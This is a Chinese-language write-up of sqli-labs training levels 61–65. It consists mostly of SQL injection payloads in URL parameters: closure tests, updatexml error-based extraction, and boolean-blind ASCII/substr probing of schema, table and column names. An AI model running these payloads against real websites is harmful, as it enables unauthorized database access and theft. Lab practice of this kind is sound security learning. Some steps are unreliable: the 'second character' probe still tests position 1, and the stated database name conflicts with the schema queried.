sqli-labs靶场通关攻略(六十一关到六十五关)
sqli-labs-master靶场第六十一关
步骤一,判断闭合方式
?id=1')) --+
步骤二,查看数据库
?id=1')) and updatexml(1,concat(1,(select database())),1) --+
步骤三,查看表名
?id=-1')) and updatexml(1,concat(1,(select group_concat(table_name)from information_schema.tables where table_schema='security')),1) --+
步骤四,查看users表中列名
?id=1')) and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) --+
sqli-labs-master靶场第六十二关
步骤一,判断闭合方式
?id=1') --+
步骤二,查看数据库
判断数据库的第一个字符:
用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于98 页面显示正常 说明数据库第一位字符ascii码大于98
?id=1') and ascii(substr(database(),1,1))>98--+
判断数据库第一位字符的ascii码是否大于99 页面显示异常 说明不大于 大于98不大于99 说明第一位字符ascii码等于99
?id=1') and ascii(substr(database(),1,1))>99--+
判断数据库的第二个字符:
用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于103 页面显示正常 说明数据库第二位字符ascii码大于103
?id=1') and ascii(substr(database(),1,1))>103--+
判断数据库第一位字符的ascii码是否大于104页面显示异常 说明不大于 大于103不大于104 说明第二位字符ascii码等于104
?id=1') and ascii(substr(database(),1,1))>104--+
以此类推...最终得出challengs
步骤三,查看表名
查security数据库中第一张表的第一位字符
用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于100 页面显示正常 说明数据库第一位字符ascii码大于100
?id=1') and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+
判断数据库第一位字符的ascii码是否大于101 页面显示异常 说明不大于 大于100不大于101 说明第一位字符ascii码等于101
?id=1') and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101--+
大于100不大于101 说明第一张表的第一位字符等于101 'e'
以此类推...最终得出第一张表的表名为emails
步骤四,查看users表中列名
查看users表中第一个字段的第一位字符
?id=1') and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>104--+
?id=1') and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>105--+
说明users表的第一个字段的第一位字符ascii码为105 'i'
以此类推...最终得出users表的第一个字段为id
sqli-labs-master靶场第六十三关
步骤一,判断闭合方式
?id=1' --+
步骤二,查看数据库
判断数据库的第一个字符:
用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于98 页面显示正常 说明数据库第一位字符ascii码大于98
?id=1' and ascii(substr(database(),1,1))>98--+
判断数据库第一位字符的ascii码是否大于99 页面显示异常 说明不大于 大于98不大于99 说明第一位字符ascii码等于99
?id=1' and ascii(substr(database(),1,1))>99--+
以此类推...最终得出challengs
步骤三,查看表名
查security数据库中第一张表的第一位字符
用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于100 页面显示正常 说明数据库第一位字符ascii码大于100
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+
判断数据库第一位字符的ascii码是否大于101 页面显示异常 说明不大于 大于100不大于101 说明第一位字符ascii码等于101
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101--+
大于100不大于101 说明第一张表的第一位字符等于101 'e'
以此类推...最终得出第一张表的表名为emails
步骤四,查看users表中列名
查看users表中第一个字段的第一位字符
?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>104--+
?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>105--+
说明users表的第一个字段的第一位字符ascii码为105 'i'
以此类推...最终得出users表的第一个字段为id
sqli-labs-master靶场第六十四关
步骤一,判断闭合方式
?id=1)) --+
步骤二,查看数据库
判断数据库的第一个字符:
用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于98 页面显示正常 说明数据库第一位字符ascii码大于98
?id=1)) and ascii(substr(database(),1,1))>98--+
判断数据库第一位字符的ascii码是否大于99 页面显示异常 说明不大于 大于98不大于99 说明第一位字符ascii码等于99
?id=1)) and ascii(substr(database(),1,1))>99--+
以此类推...最终得出challengs
步骤三,查看表名
查security数据库中第一张表的第一位字符
用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于100 页面显示正常 说明数据库第一位字符ascii码大于100
?id=1)) and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+
判断数据库第一位字符的ascii码是否大于101 页面显示异常 说明不大于 大于100不大于101 说明第一位字符ascii码等于101
?id=1)) and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101--+
大于100不大于101 说明第一张表的第一位字符等于101 'e'
以此类推...最终得出第一张表的表名为emails
步骤四,查看users表中列名
查看users表中第一个字段的第一位字符
?id=1)) and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>104--+
?id=1)) and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>105--+
说明users表的第一个字段的第一位字符ascii码为105 'i'
以此类推...最终得出users表的第一个字段为id
sqli-labs-master靶场第六十五关
步骤一,判断闭合方式
?id=1") --+
步骤二,查看数据库
判断数据库的第一个字符:
用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于98 页面显示正常 说明数据库第一位字符ascii码大于98
?id=1") and ascii(substr(database(),1,1))>98--+
判断数据库第一位字符的ascii码是否大于99 页面显示异常 说明不大于 大于98不大于99 说明第一位字符ascii码等于99
?id=1") and ascii(substr(database(),1,1))>99--+
以此类推...最终得出challengs
步骤三,查看表名
查security数据库中第一张表的第一位字符
用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于100 页面显示正常 说明数据库第一位字符ascii码大于100
?id=1") and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+
判断数据库第一位字符的ascii码是否大于101 页面显示异常 说明不大于 大于100不大于101 说明第一位字符ascii码等于101
?id=1") and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101--+
大于100不大于101 说明第一张表的第一位字符等于101 'e'
以此类推...最终得出第一张表的表名为emails
步骤四,查看users表中列名
查看users表中第一个字段的第一位字符
?id=1") and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>104--+
?id=1") and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>105--+
说明users表的第一个字段的第一位字符ascii码为105 'i'
以此类推...最终得出users表的第一个字段为id